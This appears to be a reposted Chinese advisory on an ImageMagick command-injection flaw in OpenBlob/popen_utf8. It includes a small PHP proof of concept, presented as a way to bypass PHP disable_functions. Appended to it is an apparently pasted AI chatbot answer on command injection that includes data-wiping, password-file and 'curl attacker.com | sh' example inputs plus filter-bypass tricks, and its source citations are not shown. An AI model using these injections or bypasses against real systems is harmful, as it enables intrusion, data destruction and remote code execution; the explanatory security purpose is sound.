ImageMagick popen_utf8 命令注入漏洞分析报告

ImageMagick在处理含特定字符的文件名时存在命令注入漏洞。通过构造恶意文件名,攻击者能执行任意系统命令。此漏洞影响广泛使用的ImageMagick版本。

ImageMagick popen_utf8 命令注入漏洞分析报告

时间:2016-08-09 17:07 来源:知道创宇404安全实验室 作者:SecYe安全 阅读:728次

一、漏洞概要

i. 漏洞描述

ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。我发现当用户传入一个包含|竖线的文件名的时候,就有可能触发命令注入漏洞。

ii. 漏洞影响

测试:ImageMagick-7.0.1-2.tar.bz2

iii. 漏洞分析

ImageMagick在处理文件名时会调用OpenBlob()函数,在OpenBlob()函数中,代码2484行,判断文件名是否以|竖线开头,如果是,那么他会调用popoen_utf8()函数处理文件名,代码如图:

图片 1

来到popoen_utf8()函数,popen_utf8()函数调用会调用popen()函数打开文件,这样就导致我们可以注入系统命令,代码如图:

图片 1

iv. 漏洞利用(PHP)

在PHP禁用执行系统命令函数的时候,我们可以用他来绕过disable_funtion,PHP编写如下代码:

<?php
new Imagick('|touch /tmp/niubl');
?>

使用PHP执行,结果如图:

图片 1

二、修复方案

目前官方已经更新代码至 Gitlab,但最终修复版本还未发布,补丁细节可参考如下链接:

http://git.imagemagick.org/repos/ImageMagick/commit/40639d173aa8c76b850d625c630b711fee4dcfb

http://git.imagemagick.org/repos/ImageMagick/commit/4674b3e1ea87a69646a6dbac8772c45eeb20c9f0

三、漏洞时间线

2016.05.07 知道创宇404安全实验室niubl发现该漏洞

2016.05.29 国外研究者报告并公布了漏洞细节 http://permalink.gmane.org/gmane.comp.security.oss.general/19669

2016.05.30 发布分析报告

四、相关资源链接

http://www.imagemagick.org/download/beta/

http://permalink.gmane.org/gmane.comp.security.oss.general/19669

<think>好的,我现在需要回答用户关于命令注入漏洞的工作原理、形成原因及利用机制的问题。首先,我应该回顾用户提供的引用资料,提取关键信息,并组织成结构清晰的回答。 首先,用户提到的四个引用中,引用[3]详细解释了命令注入漏洞的本质和工作机制,包括用户输入捕获、未过滤的输入、恶意构造和命令执行四个步骤。引用[1]和[4]提到了漏洞的形成原因,如代码层过滤不严、系统漏洞、第三方组件问题等。引用[2]虽然关于SQL注入,但可能对理解注入漏洞有帮助,不过这里主要关注命令注入。 我需要将形成原因和机制分开阐述。形成原因包括输入验证不足、直接拼接命令、系统或第三方漏洞。利用机制则是攻击者如何构造输入,绕过过滤,执行恶意命令。比如使用特殊字符如分号、管道符等分隔命令,或者利用环境变量注入。 同时,用户要求生成相关问题,我需要确保问题相关且覆盖漏洞防御、检测、案例、区别等方面。例如,如何防御,检测方法,历史案例,与代码执行漏洞的区别等。 要注意使用中文,数学公式用$...$,独立公式用$$...$$,但这里可能涉及较少数学内容。同时要自然添加引用标识,例如在解释过滤不严时引用[4],在机制部分引用[3]。 最后,确保回答结构清晰,分点说明原因和机制,并附上相关问题。避免使用Markdown格式,使用有序列表和段落分隔。检查是否符合所有系统级指令,如引用正确,LaTeX正确,生成的问题相关且合理。</think>### 命令注入漏洞的工作原理 #### 一、形成原因 1. **输入验证不足** 程序未对用户输入进行充分过滤或验证,直接将其与系统命令拼接。例如,使用`system()`函数调用时未处理用户可控参数[^4]。 例如:`system("ping " + user_input)`,若用户输入`8.8.8.8; rm -rf /`,会导致后续命令被执行。 2. **命令拼接逻辑不安全** 开发者将用户输入与固定命令字符串直接组合,未使用安全的参数化方式(如白名单或转义特殊字符)。例如: ```php $cmd = "nslookup " . $_GET['domain']; exec($cmd); // 直接拼接存在风险 ``` 3. **依赖不安全的环境或组件** - 系统本身存在漏洞(如CVE-2014-6271 Bash破壳漏洞)。 - 第三方库(如ImageMagick、Struts2)存在命令执行缺陷。 #### 二、利用机制 攻击者通过以下步骤实现命令注入: 1. **构造恶意输入** 在用户输入中插入命令分隔符(如`;`、`&&`、`|`)或环境变量注入符号(如`${}`)。 示例:输入`example.com; cat /etc/passwd`,拼接后命令变为: $$ \text{nslookup example.com; cat /etc/passwd} $$ 2. **绕过过滤规则** - 使用编码或通配符绕过黑名单过滤,如`\u003b`(Unicode分号)或`/???/passwd`(通配符匹配路径)[^3]。 - 利用环境变量注入:`$(id)`或`` `id` ``执行子命令。 3. **执行任意命令** 恶意输入被操作系统解释为合法命令,导致信息泄露、数据破坏或系统控制。例如: ```bash curl http://attacker.com/exploit.sh | sh # 下载并执行恶意脚本 ``` #### 三、典型场景 - Web应用调用命令行工具(如Ping、Dig)。 - 内容管理系统(CMS)调用外部程序处理文件上传[^1]。 - 服务器管理界面执行系统命令(如重启服务)。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值